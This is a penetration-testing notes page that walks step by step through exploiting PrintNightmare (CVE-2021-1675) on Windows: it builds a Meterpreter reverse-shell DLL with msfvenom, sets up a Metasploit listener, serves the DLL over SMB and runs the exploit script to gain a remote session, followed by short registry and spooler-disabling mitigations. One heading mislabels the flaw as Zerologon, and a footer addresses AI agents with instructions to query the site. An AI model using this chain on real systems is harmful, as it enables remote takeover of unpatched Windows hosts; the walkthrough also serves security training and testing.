# PrintNightmare (CVE-2021-1675)

**PrintNightmare (CVE-2021-1675)**  is a critical vulnerability in the Windows Print Spooler service that allows remote code execution. This vulnerability can be exploited to execute malicious DLLs either remotely or locally on affected machines.

#### Step-by-Step Process to Check for Zerologon Vulnerability

1. **Check if the Domain is Vulnerable:**

   Use the following [script](https://github.com/fortra/impacket/blob/master/examples/rpcdump.py) to test if your domain is vulnerable to PrintNightmare:

<figure><img src="/files/BhskYe2YhQvnuC1XJzUm" alt=""><figcaption></figcaption></figure>

if you saw this output then your target is vulnrable.&#x20;

2. **Installation :**&#x20;

   Before executing the exploit, ensure you have the correct version of **Impacket** installed. Follow these steps:

   1. Uninstall the default Impacket version:

      ```bash
      pip3 uninstall impacket
      ```
   2. Clone the custom Impacket repository:

      ```bash
      git clone https://github.com/cube0x0/impacket
      cd impacket
      python3 ./setup.py install
      ```

To create a Meterpreter payload that will provide remote shell access, use **msfvenom** to generate a malicious DLL :&#x20;

```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=5555 -f dll > shell.dll
```

<figure><img src="/files/6yz3oZcpXdSntFJBSQ7P" alt=""><figcaption></figcaption></figure>

**3. Setting Up the Metasploit Listener**

1. **Open Metasploit Framework:**

<figure><img src="/files/nLitd63x5yW0C81UeFhf" alt=""><figcaption></figcaption></figure>

**Use the `multi/handler` exploit:**

```bash
use exploit/multi/handler
```

**Set the payload:**

```bash
set payload windows/x64/meterpreter/reverse_tcp
```

**Configure the listener with your IP and port:**

```bash
set LHOST <your_ip>
set LPORT 5555
```

**Verify the settings:**

```bash
options
```

**Run the exploit:**

```bash
run
```

<figure><img src="/files/GECJGGa2HFRgQMkW7y43" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/o9jzMYpTl4OPk7y51uS7" alt=""><figcaption></figcaption></figure>

**4. Setting Up File Sharing (SMB)**

You need to share the location of your payload (`shell.dll`) so that it can be accessed by the target machine.

1. **Start an SMB server** to share the directory containing `shell.dll`:

   ```bash
   python3 smbserver.py share <path-to-your-directory> //You may need to use the -smb2support flag if SMBv1 doesn't work.
   ```

<figure><img src="/files/3PHTl89OQZGJeflof7DV" alt=""><figcaption><p>now we shred the whole currecnt directory </p></figcaption></figure>

**6. Running the PrintNightmare Exploit**

Now that everything is set up, execute the **PrintNightmare** exploit. This is done by running the `CVE-2021-1675.py` script.

```bash
python3 CVE-2021-1675.py <domain>/<any-user>:<password>@<target-ip> '\\<file-share-location>'
```

<figure><img src="/files/oKcIDIVijpyHCBbwBFML" alt=""><figcaption></figcaption></figure>

**7. Post-Exploit: Catch the Meterpreter Session**

After executing the exploit, you should see a connection from the target system in Metasploit. Once the payload is triggered, you'll have a Meterpreter session established, allowing you to interact with the compromised system.

#### Mitigation

**Microsoft has released patches** for this vulnerability, but the system may still be vulnerable if the following registry values are present:

```bash
REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
```

To mitigate this vulnerability, ensure these values are set to the correct restrictions or disable the Print Spooler service altogether.

#### Disable the Spooler Service

You can disable the **Spooler service** to prevent further exploitation:

```bash
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start" /t REG_DWORD /d "4" /f
```

This will stop and disable the Print Spooler service on the target machine.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ahmed-tarek.gitbook.io/security-notes/notes/active-directory-pentesting/initial-attack-vectors/some-other-attacks/printnightmare-cve-2021-1675.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.